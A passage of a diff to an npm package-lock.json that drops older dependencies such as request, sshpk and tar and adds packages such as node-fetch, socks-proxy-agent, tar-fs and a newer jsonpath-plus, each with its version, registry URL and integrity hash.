"https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.2.0.tgz", - "integrity": "sha512-T9V+8iNYKFL2n2rF+w02LBOT2JjDnTjioaNFrxRy0Bv1y/hNsqR/EBK7Ojy2ythRHwmz2cRIls+9JitQGZC/sw==", + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", + "license": "MIT", "dependencies": { "@jsep-plugin/assignment": "^1.3.0", "@jsep-plugin/regex": "^1.0.4", @@ -619,25 +441,6 @@ "node": ">=0.10.0" } }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - }, - "engines": { - "node": ">=0.6.0" - } - }, - "node_modules/lru-cache": { - "version": "10.4.3", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", - "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==" - }, "node_modules/mime-db": { "version": "1.49.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", @@ -657,76 +460,53 @@ "node": ">= 0.6" } }, - "node_modules/minimatch": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", - "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", - "dependencies": { - "brace-expansion": "^2.0.1" - }, - "engines": { - "node": ">=16 || 14 >=14.17" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==", - "engines": { - "node": ">=16 || 14 >=14.17" - } + "node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "license": "MIT" }, - "node_modules/minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", + "node_modules/node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "license": "MIT", "dependencies": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" + "whatwg-url": "^5.0.0" }, "engines": { - "node": ">= 18" - } - }, - "node_modules/mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==", - "bin": { - "mkdirp": "dist/cjs/src/bin.js" + "node": "4.x || >=6.0.0" }, - "engines": { - "node": ">=10" + "peerDependencies": { + "encoding": "^0.1.0" }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "engines": { - "node": "*" + "peerDependenciesMeta": { + "encoding": { + "optional": true + } } }, "node_modules/oauth4webapi": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", - "optional": true, "funding": { "url": "https://github.com/sponsors/panva" } }, + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "license": "ISC", + "dependencies": { + "wrappy": "1" + } + }, "node_modules/openid-client": { "version": "6.1.3", "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, "dependencies": { "jose": "^5.9.6", "oauth4webapi": "^3.1.1" @@ -735,491 +515,172 @@ "url": "https://github.com/sponsors/panva" } }, - "node_modules/package-json-from-dist": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", - "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==" - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "engines": { - "node": ">=8" - } - }, - "node_modules/path-scurry": { - "version": "1.11.1", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", - "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", - "dependencies": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - }, - "engines": { - "node": ">=16 || 14 >=14.18" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" - }, "node_modules/proxy-from-env": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" }, - "node_modules/psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" + "node_modules/pump": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.2.tgz", + "integrity": "sha512-tUPXtzlGM8FE3P0ZL6DVs/3P58k9nk8/jZeQCurTJylQA8qFYzHFfhBJkuqyE0FifOsQ0uKWekiZ5g8wtr28cw==", + "license": "MIT", + "dependencies": { + "end-of-stream": "^1.1.0", + "once": "^1.3.1" + } }, - "node_modules/punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==", + "node_modules/require-from-string": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz", + "integrity": "sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==", "engines": { - "node": ">=6" + "node": ">=0.10.0" } }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", + "node_modules/rfc4648": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", + "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" + }, + "node_modules/smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", + "license": "MIT", "engines": { - "node": ">=0.6" + "node": ">= 6.0.0", + "npm": ">= 3.0.0" } }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", + "node_modules/socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", + "license": "MIT", "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" }, "engines": { - "node": ">= 6" + "node": ">= 10.0.0", + "npm": ">= 3.0.0" } }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", + "node_modules/socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", + "license": "MIT", "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" }, "engines": { - "node": ">= 0.12" + "node": ">= 14" } }, - "node_modules/request/node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } + "node_modules/sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "license": "BSD-3-Clause" }, - "node_modules/require-from-string": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz", - "integrity": "sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==", + "node_modules/stream-buffers": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", + "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", "engines": { - "node": ">=0.10.0" + "node": ">= 0.10.0" } }, - "node_modules/rfc4648": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", - "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" - }, - "node_modules/rimraf": { - "version": "5.0.10", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.10.tgz", - "integrity": "sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==", + "node_modules/streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", + "license": "MIT", "dependencies": { - "glob": "^10.3.7" + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" }, - "bin": { - "rimraf": "dist/esm/bin.mjs" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/safe-buffer": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", - "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/feross" - }, - { - "type": "patreon", - "url": "https://www.patreon.com/feross" - }, - { - "type": "consulting", - "url": "https://feross.org/support" - } - ] - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/sshpk": { - "version": "1.16.1", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.16.1.tgz", - "integrity": "sha512-HXXqVUq7+pcKeLqqZj6mHFUMvXtOJt1uoUx09pFW6011inTMxqI8BA8PM95myrIyyKwdnzjdFjLiE6KBPVtJIg==", - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "engines": { - "node": ">= 0.10.0" - } - }, - "node_modules/string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "dependencies": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/string-width-cjs": { - "name": "string-width", - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/string-width-cjs/node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/string-width-cjs/node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "node_modules/string-width-cjs/node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "dependencies": { - "ansi-regex": "^6.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/strip-ansi?sponsor=1" - } - }, - "node_modules/strip-ansi-cjs": { - "name": "strip-ansi", - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi-cjs/node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/tar": { - "version": "7.4.3", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.4.3.tgz", - "integrity": "sha512-5S7Va8hKfV7W5U6g3aYxXmlPoZVAwUMy9AOKyF2fVuZa2UD3qZjg578OrLRt8PcNN1PleVaL/5/yYATNL0ICUw==", - "dependencies": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - }, - "engines": { - "node": ">=18" - } - }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - }, - "engines": { - "node": ">=0.8" - } - }, - "node_modules/tslib": { - "version": "2.4.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", - "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==" - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", - "dependencies": { - "safe-buffer": "^5.0.1" - }, - "engines": { - "node": "*" - } - }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" - }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dependencies": { - "punycode": "^2.1.0" - } - }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "engines": [ - "node >=0.6.0" - ], - "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" + "optionalDependencies": { + "bare-events": "^2.2.0" } }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", + "node_modules/tar-fs": { + "version": "3.0.9", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.0.9.tgz", + "integrity": "sha512-XF4w9Xp+ZQgifKakjZYmFdkLoSWd34VGKcsTCwlNWM7QG3ZbaxnTsaBwnjFZqHRf/rROxaR8rXnbtwdvaDI+lA==", + "license": "MIT", "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" + "pump": "^3.0.0", + "tar-stream": "^3.1.5" }, - "engines": { - "node": ">= 8" + "optionalDependencies": { + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0" } }, - "node_modules/wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", + "node_modules/tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", + "license": "MIT", "dependencies": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" } }, - "node_modules/wrap-ansi-cjs": { - "name": "wrap-ansi", - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "node_modules/text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", + "license": "Apache-2.0", "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" + "b4a": "^1.6.4" } }, - "node_modules/wrap-ansi-cjs/node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } + "node_modules/tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==", + "license": "MIT" }, - "node_modules/wrap-ansi-cjs/node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } + "node_modules/undici-types": { + "version": "6.20.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", + "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==", + "license": "MIT" }, - "node_modules/wrap-ansi-cjs/node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": 